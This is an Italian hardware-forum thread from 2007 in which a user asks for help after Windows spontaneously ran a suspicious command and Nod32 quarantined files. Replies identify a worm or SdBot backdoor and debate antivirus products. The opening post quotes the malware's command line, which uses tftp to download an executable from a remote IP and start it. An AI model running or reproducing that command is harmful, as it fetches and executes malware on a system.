|
|||||||
|
|
|
![]() |
|
|
Strumenti |
|
|
#1 |
|
Senior Member
Iscritto dal: Jun 2001
Città: Puglia - Bari -
Messaggi: 339
|
Nod32 e system32/tftp.exe
Salve ragazzi.....sottopongo ai più il quesito prima di ricorrere alle maniere forti con il mio pc (formattare
Lavoro tranquillamente quando all'improvviso la finestra "esegui" si attiva con la seguente istruzione: "%comspec% /c tftp -i 68.43.148.121 GET zkbagzd.exe & start zkbagzd". Panico....successivamente si apre il prompt di ms-dos con il file cmd.exe che si avvia bloccato prontamente dall'antivirus Nod32. Cosa sarà mai? il mio intuito mi dice che quella istruzione serva a far avviare il file zkbagzd.exe richiesto da quell'ip. In realtà il suddetto file non esiste nel pc....forse l'antivirus lo avrà eliminato? Nel file dei rapporti del Nod32 mi indica che ha posto in quarantena il file "tftp2448 oppure tftp3478 ecc...."che è probabilmente un virus sconosciuto ed è causato dal file tftp.exe. quali i rimedi possibili? grazie a quanti mi aiuteranno N.B.:ricordo che il file tftp è un file di sistema quindi non serve cancellarlo dal pc!
__________________
NAS KRAUN 304S THREAD UFFICIALE Ultima modifica di atarumorobosci : 17-02-2007 alle 17:09. |
|
|
|
|
|
#2 |
|
Senior Member
Iscritto dal: Apr 2006
Messaggi: 22462
|
complimenti per esser stato infettato da
Cycle.worm.a scaricati kasperksy antivirus 6 in trial leva nod e fai un bel passaggio dopo l'aggiornamento
__________________
amd a64x2 4400+ sk939;asus a8n-sli; 2x1gb ddr400; x850 crossfire; 2 x western digital abys 320gb|| asus g1
Se striscia fulmina, se svolazza l'ammazza |
|
|
|
|
|
#3 | |
|
Senior Member
Iscritto dal: Jun 2001
Città: Puglia - Bari -
Messaggi: 339
|
Quote:
Ps: cacchio allora questo Nod32 non vale una cippalippa?
__________________
NAS KRAUN 304S THREAD UFFICIALE |
|
|
|
|
|
|
#4 |
|
Senior Member
Iscritto dal: Apr 2006
Messaggi: 22462
|
con i virus subdoli il kas è l'unico che compente
__________________
amd a64x2 4400+ sk939;asus a8n-sli; 2x1gb ddr400; x850 crossfire; 2 x western digital abys 320gb|| asus g1
Se striscia fulmina, se svolazza l'ammazza |
|
|
|
|
|
#5 | |
|
Senior Member
Iscritto dal: Oct 2006
Città: Napoli
Messaggi: 2235
|
Quote:
Nessun antivirus rimuove tutti i virus dobbiamo collaborare anche noi a tenere il pc protetto ad esempio evitando di andare su siti bancari,casinò,porno... Comunque sul pc non basta solo un antivirus ma ci vuole anche un antispyware,antiadware e un firewall per proteggersi come minimo P.S. Scusa hai il service pack 2? Ultima modifica di raffree : 17-02-2007 alle 18:28. |
|
|
|
|
|
|
#6 | |
|
Senior Member
Iscritto dal: Jun 2001
Città: Puglia - Bari -
Messaggi: 339
|
Quote:
cmq applico e ti faccio sapere....il pc è in remoto collegato all'ufficio.... Ps: vorrei tanto sapere qual era lo scopo di questo bast..... di worm!!!
__________________
NAS KRAUN 304S THREAD UFFICIALE Ultima modifica di atarumorobosci : 18-02-2007 alle 04:23. |
|
|
|
|
|
|
#7 | |
|
Senior Member
Iscritto dal: Apr 2006
Messaggi: 22462
|
Quote:
si av free ti consiglio avs che è il fratello minore del kasperksy
__________________
amd a64x2 4400+ sk939;asus a8n-sli; 2x1gb ddr400; x850 crossfire; 2 x western digital abys 320gb|| asus g1
Se striscia fulmina, se svolazza l'ammazza |
|
|
|
|
|
|
#8 |
|
Senior Member
Iscritto dal: Oct 2006
Città: Napoli
Messaggi: 2235
|
Io invece te lo sconsiglio active virus shield (fratello minore del kaspersky) perchè anche avendo una buona rilevazione dei virus non ha il web antivirus cosa che è IMPORTANTISSIMA
|
|
|
|
|
|
#9 |
|
Senior Member
Iscritto dal: Apr 2006
Messaggi: 22462
|
e trovamene uno free e potente che ce l'abbia
__________________
amd a64x2 4400+ sk939;asus a8n-sli; 2x1gb ddr400; x850 crossfire; 2 x western digital abys 320gb|| asus g1
Se striscia fulmina, se svolazza l'ammazza |
|
|
|
|
|
#10 |
|
Senior Member
Iscritto dal: Oct 2006
Città: Napoli
Messaggi: 2235
|
|
|
|
|
|
|
#11 |
|
Senior Member
Iscritto dal: Apr 2006
Messaggi: 22462
|
avast è l'unico che ha lo scanner web; ma personalmente tanto vale resti al nod32; almeno ha la leggerezza e l'euristica;
__________________
amd a64x2 4400+ sk939;asus a8n-sli; 2x1gb ddr400; x850 crossfire; 2 x western digital abys 320gb|| asus g1
Se striscia fulmina, se svolazza l'ammazza |
|
|
|
|
|
#12 |
|
Senior Member
Iscritto dal: Feb 2007
Città: Sassari
Messaggi: 1364
|
Io con nod32 mi trovo benissimo e giro anche sui siti poco raccomandabili che dite voi.
L'importante è affiancarci un ottimo firewall (io uso zonealarm) e un ottimo antispyware, il vecchio ewido ora avg antispyware è veramente efficace. Mai avuto nessun problema di troian ecc... cmq controllare ogni tanto anche con adaware e spyboat non fa mai male.... ricordatevi sempre anche di controllare cosa avvia il sistema automaticamente. |
|
|
|
|
|
#13 | |
|
Senior Member
Iscritto dal: May 2002
Messaggi: 3126
|
Quote:
guarda anch io uso nod32 da qualche mese su un portatile certo che paragonare nod32 a avast mi sembra una bestemmia,comunque nod3 come ogni antivirus è strutturato in maniera che l utente possa configurarlo alle proprie esigenze quindi esistono le opzioni.Se nod32 ti ha trovato un operazione sospetta e te la messa in quarantena vuol dire che nelle opzioni sul da farsi è spuntato così se volevi eliminarlo direttamente potevi spuntare diversamente l opzione però non avresti potuto esaminarlo al meglio o al limite spedirlo ai laboratori nod32 per studiarlo fidati non paragonare più nod32 a avast che è una bestemmia..volevo specificare come ultima cosa che nod32 svetta nelle alte classifiche dei antivirus più sofisticati mentre avast è non il penultimo ma l ultimo in tutte le classifiche degne di questa nomea Ultima modifica di lord2 : 18-02-2007 alle 15:11. |
|
|
|
|
|
|
#14 |
|
Senior Member
Iscritto dal: May 2002
Messaggi: 3126
|
e comunque più che un vero virus si tratti di una vera e propria Backdoor:IRC/SdBot.dam Backdoor=porta aperta per chi vuole entrare nel tuo pc a tua insaputa e rubarti dati protetti come giustamente hai il timore dati bancari etc etc quindi nod32 ha fatto più del suo compito per il quale è stato creato
|
|
|
|
|
|
#15 | |
|
Senior Member
Iscritto dal: Feb 2007
Città: Sassari
Messaggi: 1364
|
Quote:
Cmq acquista avg antispyware e vedi che poi non avrai più problemi con trojan, li blocca tutti in tempo reale. |
|
|
|
|
|
|
#16 |
|
Senior Member
Iscritto dal: Jun 2001
Città: Puglia - Bari -
Messaggi: 339
|
il risultato è lo stesso!!!!il file viene individuato cancellato ma non disinfettato!in sostanza al riavvio del pc sono punto e a capo....quindi nod32=avast=kasper.....ahimè domani formatto tutto....
__________________
NAS KRAUN 304S THREAD UFFICIALE |
|
|
|
|
|
#17 | |
|
Senior Member
Iscritto dal: Feb 2007
Città: Sassari
Messaggi: 1364
|
Quote:
fai anche una scansione con hjiack |
|
|
|
|
|
|
#18 |
|
Senior Member
Iscritto dal: May 2002
Messaggi: 3126
|
hai disattivato il restore system?magari questa fogna si è assimilato un file di sistema per questo non te lo fa modificare perchè indispensabile al sistema
|
|
|
|
|
|
#19 |
|
Senior Member
Iscritto dal: Jun 2001
Città: Puglia - Bari -
Messaggi: 339
|
scusate ma il file c/windows/system32/tftp.exe è un file di sistema o non serve ad una mazza?controllate nei vostri pc!
__________________
NAS KRAUN 304S THREAD UFFICIALE |
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 00:37.




















